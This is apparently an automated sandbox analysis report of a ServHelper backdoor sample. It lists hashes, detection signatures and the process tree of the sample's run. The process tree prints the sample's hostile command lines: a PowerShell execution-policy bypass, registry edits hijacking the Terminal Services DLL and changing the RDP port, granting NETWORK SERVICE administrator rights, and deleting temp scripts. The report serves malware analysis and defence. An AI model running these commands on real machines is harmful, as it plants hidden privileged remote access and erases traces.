Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
110s -
max time network
122s -
submitted
01/01/1970, 00:00
Static task
static1
Behavioral task
behavioral1
Sample
edc29fe698230e37846eaa00d4aeed60550c09674bf628237c9b942e0085d121.exe
Resource
win10-en-20210920
0 signatures
0 seconds
General
-
Target
edc29fe698230e37846eaa00d4aeed60550c09674bf628237c9b942e0085d121.exe
-
Size
4.3MB
-
MD5
239348d287c11a59a46078a95c0274ba
-
SHA1
e27f3e5a2c8b629d799d3d04396fcec50c435e6f
-
SHA256
edc29fe698230e37846eaa00d4aeed60550c09674bf628237c9b942e0085d121
-
SHA512
69f0ef71d9d358ceb4a73345cefa48a8e388f6a9dd62aa82487fbe1983c8d372dd40407e756ac7245d45b85fdcc2c4b538b02d6a7b9cb3f874ea64cb0cbc0397
Score
10/10
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2712 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 3988 powershell.exe 3988 powershell.exe 3988 powershell.exe 1204 powershell.exe 1204 powershell.exe 1204 powershell.exe 3352 powershell.exe 3352 powershell.exe 3352 powershell.exe 3884 powershell.exe 3884 powershell.exe 3884 powershell.exe 3988 powershell.exe 3988 powershell.exe 3988 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 636 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3988 powershell.exe Token: SeDebugPrivilege 1204 powershell.exe Token: SeDebugPrivilege 3352 powershell.exe Token: SeDebugPrivilege 3884 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 3364 wrote to memory of 3988 3364 edc29fe698230e37846eaa00d4aeed60550c09674bf628237c9b942e0085d121.exe 70 PID 3364 wrote to memory of 3988 3364 edc29fe698230e37846eaa00d4aeed60550c09674bf628237c9b942e0085d121.exe 70 PID 3364 wrote to memory of 3988 3364 edc29fe698230e37846eaa00d4aeed60550c09674bf628237c9b942e0085d121.exe 70 PID 3988 wrote to memory of 372 3988 powershell.exe 72 PID 3988 wrote to memory of 372 3988 powershell.exe 72 PID 3988 wrote to memory of 372 3988 powershell.exe 72 PID 372 wrote to memory of 1628 372 csc.exe 73 PID 372 wrote to memory of 1628 372 csc.exe 73 PID 372 wrote to memory of 1628 372 csc.exe 73 PID 3988 wrote to memory of 1204 3988 powershell.exe 74 PID 3988 wrote to memory of 1204 3988 powershell.exe 74 PID 3988 wrote to memory of 1204 3988 powershell.exe 74 PID 3988 wrote to memory of 3352 3988 powershell.exe 76 PID 3988 wrote to memory of 3352 3988 powershell.exe 76 PID 3988 wrote to memory of 3352 3988 powershell.exe 76 PID 3988 wrote to memory of 3884 3988 powershell.exe 78 PID 3988 wrote to memory of 3884 3988 powershell.exe 78 PID 3988 wrote to memory of 3884 3988 powershell.exe 78 PID 3988 wrote to memory of 2280 3988 powershell.exe 80 PID 3988 wrote to memory of 2280 3988 powershell.exe 80 PID 3988 wrote to memory of 2280 3988 powershell.exe 80 PID 3988 wrote to memory of 2712 3988 powershell.exe 81 PID 3988 wrote to memory of 2712 3988 powershell.exe 81 PID 3988 wrote to memory of 2712 3988 powershell.exe 81 PID 3988 wrote to memory of 1732 3988 powershell.exe 82 PID 3988 wrote to memory of 1732 3988 powershell.exe 82 PID 3988 wrote to memory of 1732 3988 powershell.exe 82 PID 3988 wrote to memory of 2952 3988 powershell.exe 83 PID 3988 wrote to memory of 2952 3988 powershell.exe 83 PID 3988 wrote to memory of 2952 3988 powershell.exe 83 PID 2952 wrote to memory of 504 2952 net.exe 84 PID 2952 wrote to memory of 504 2952 net.exe 84 PID 2952 wrote to memory of 504 2952 net.exe 84 PID 3988 wrote to memory of 3200 3988 powershell.exe 85 PID 3988 wrote to memory of 3200 3988 powershell.exe 85 PID 3988 wrote to memory of 3200 3988 powershell.exe 85 PID 3200 wrote to memory of 3628 3200 cmd.exe 86 PID 3200 wrote to memory of 3628 3200 cmd.exe 86 PID 3200 wrote to memory of 3628 3200 cmd.exe 86 PID 3628 wrote to memory of 3720 3628 cmd.exe 87 PID 3628 wrote to memory of 3720 3628 cmd.exe 87 PID 3628 wrote to memory of 3720 3628 cmd.exe 87 PID 3720 wrote to memory of 2708 3720 net.exe 88 PID 3720 wrote to memory of 2708 3720 net.exe 88 PID 3720 wrote to memory of 2708 3720 net.exe 88 PID 3988 wrote to memory of 660 3988 powershell.exe 89 PID 3988 wrote to memory of 660 3988 powershell.exe 89 PID 3988 wrote to memory of 660 3988 powershell.exe 89 PID 660 wrote to memory of 2880 660 cmd.exe 90 PID 660 wrote to memory of 2880 660 cmd.exe 90 PID 660 wrote to memory of 2880 660 cmd.exe 90 PID 2880 wrote to memory of 3736 2880 cmd.exe 91 PID 2880 wrote to memory of 3736 2880 cmd.exe 91 PID 2880 wrote to memory of 3736 2880 cmd.exe 91 PID 3736 wrote to memory of 3068 3736 net.exe 92 PID 3736 wrote to memory of 3068 3736 net.exe 92 PID 3736 wrote to memory of 3068 3736 net.exe 92 PID 3988 wrote to memory of 1080 3988 powershell.exe 97 PID 3988 wrote to memory of 1080 3988 powershell.exe 97 PID 3988 wrote to memory of 1080 3988 powershell.exe 97 PID 3988 wrote to memory of 1124 3988 powershell.exe 98 PID 3988 wrote to memory of 1124 3988 powershell.exe 98 PID 3988 wrote to memory of 1124 3988 powershell.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\edc29fe698230e37846eaa00d4aeed60550c09674bf628237c9b942e0085d121.exe"C:\Users\Admin\AppData\Local\Temp\edc29fe698230e37846eaa00d4aeed60550c09674bf628237c9b942e0085d121.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3364 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d5pplxag\d5pplxag.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD66B.tmp" "c:\Users\Admin\AppData\Local\Temp\d5pplxag\CSC5CA27E7958FB43B9BA8F4AEDFF411038.TMP"4⤵PID:1628
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3352
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1732
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:504
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2708
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3068
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1080
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1124
-
-